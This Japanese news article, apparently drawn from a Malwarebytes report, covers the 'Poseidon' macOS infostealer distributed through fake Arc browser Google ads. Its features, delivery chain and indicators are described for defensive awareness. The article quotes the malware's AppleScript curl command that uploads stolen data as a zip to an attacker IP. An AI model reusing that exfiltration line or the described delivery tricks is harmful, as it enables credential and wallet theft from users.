Last Updated on 2024-06-28 07:17 by admin
2024年6月24日、Macユーザーを狙った新しいキャンペーンが、Arcブラウザの悪意のあるGoogle広告を通じて配布された。
このキャンペーンでは、macOS用のスティーラーが配布され、これはAtomic Stealerの競合として積極的に開発されている。このスティーラーは、以前OSX.RodStealerとしてMalwarebytesによって追跡されていたもので、作者はRodrigo4とされる。新しいプロジェクト「Poseidon」としてリブランドされ、VPN設定の窃取などの新機能が追加された。
Rodrigo4は、XSSアンダーグラウンドフォーラムで新しいPRキャンペーンを開始し、Atomic Stealerと同様の機能とコードベースを持つスティーラーに取り組んでいる。このサービスには、ファイルグラバー、暗号ウォレットエクストラクター、パスワードマネージャー(Bitwarden、KeePassXC)スティーラー、ブラウザデータコレクターなどの機能が含まれる。
Google広告を通じた配布では、「Coles & Co」に属するArcブラウザの広告がarcthost[.]orgというドメイン名にリンクしていた。広告をクリックした人々は、完全に偽のサイトarc-download[.]comにリダイレクトされ、Mac用のArcが提供された。ダウンロードされたDMGファイルは、セキュリティ保護を回避するための右クリックで開くトリックを除いて、新しいMacアプリケーションのインストール時に期待されるものに似ていた。
Poseidonプロジェクトへの接続では、未完成のコードが含まれており、FortinetとOpenVPNからVPN設定を盗むために最近広告された。データの抽出は次のコマンドで明らかにされた
set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")このIPアドレスにアクセスすると、新しいPoseidonブランドのパネルが表示される。
結論として、Macマルウェア開発の活動的なシーンがあり、スティーラーに焦点を当てている。この投稿で見られるように、犯罪企業には多くの要因が寄与している。ベンダーは、製品が機能豊富であり、アンチウイルスソフトウェアからの検出が低いことを潜在的な顧客に納得させる必要がある。
新しいマルウェアペイロードの配布キャンペーンが見られることで、脅威が現実であり、新たな被害者を積極的に狙っていることが確認される。これらの脅威に対して保護されるためには、新しいアプリをダウンロードしてインストールする際には常に警戒が必要である。Malwarebytes for Macは、この「Poseidonキャンペーン」をOSX.RodStealerとして検出し、悪意のある広告に関連する情報をGoogleと共有している。広告と悪意のあるウェブサイトをブロックするウェブ保護を使用することを強く推奨する。Malwarebytes Browser Guardはその両方を効果的に行う。
【編集者追記】本文にはでてきませんが知っておきたい用語解説
- マルバタイジング(Malvertising):
「マルウェア(malware)」と「広告(advertising)」を組み合わせた造語です。正規の広告配信ネットワークを悪用して、マルウェアを配布する手法を指します。 - インフォスティーラー(Infostealer):
情報窃取型マルウェアのことです。パスワードやクレジットカード情報など、ユーザーの個人情報を密かに収集し、攻撃者に送信します。 - Atomic Stealer (AMOS):
Macを標的とした高度な情報窃取マルウェアで、暗号通貨ウォレットやパスワードマネージャーからの情報抽出などの機能を持ちます。 - AppleScript:
macOS用の自動化スクリプト言語です。正規の用途では作業の自動化に使われますが、マルウェアでも悪用されることがあります。
【参考リンク】
Arc Browser(外部)
【関連記事】
サイバーセキュリティニュースをinnovaTopiaでもっと読む
【ニュース解説】
2024年6月24日に観測された新しいキャンペーンでは、Macユーザーを狙ったスティーラー型マルウェア「Poseidon」が、Google広告を介して配布されています。このキャンペーンは、特に人気のあるArcブラウザの悪意ある広告を通じて行われ、これは近月における同様の手法の二度目の使用例です。以前はWindows用のリモートアクセストロイの木馬(RAT)が、同じくGoogle広告を通じて配布されていました。
「Poseidon」は、Atomic Stealerと競合する形で積極的に開発されており、そのコードベースの大部分は前身と同じです。このスティーラーは、ファイルの抽出、暗号通貨ウォレットの情報抽出、パスワードマネージャーからの情報窃取(Bitwarden、KeePassXC)、ブラウザデータの収集など、多岐にわたる機能を備えています。さらに、VPN設定の窃取という新機能も追加されました。
このマルウェアは、偽のArcブラウザの広告をクリックしたユーザーを偽のダウンロードサイトに誘導し、そこからマルウェアが含まれたDMGファイルをダウンロードさせる手法を用いています。この手法は、ユーザーのセキュリティ意識を逆手に取り、信頼できるアプリケーションのインストールプロセスを模倣することで、セキュリティ対策を回避します。
このようなマルウェアキャンペーンの背後には、潜在的な顧客に対して製品が機能豊富であり、かつアンチウイルスソフトウェアからの検出を回避できると納得させる必要があるという、犯罪者側のニーズがあります。そのため、彼らはしばしば新しい機能や改良を加え、製品の魅力を高めるためのPRキャンペーンを行います。
この事例から、ユーザーは新しいアプリケーションをダウンロードしてインストールする際に、特に広告を通じたものであれば、その出所を慎重に確認する必要があることがわかります。また、広告や悪意のあるウェブサイトをブロックするウェブ保護ツールの使用が、第一の防衛線として非常に有効であることが推奨されます。
長期的な視点で見ると、このようなマルウェアキャンペーンは、セキュリティソフトウェアの開発者にとって常に新しい挑戦を提起します。マルウェアの手法や機能が進化するにつれて、それを検出し、防御するための技術も同様に進化する必要があります。また、ユーザー教育の重要性も増しており、セキュリティ意識の高い行動が、マルウェア感染のリスクを減少させる鍵となります。
from ‘Poseidon’ Mac stealer distributed via Google ads.
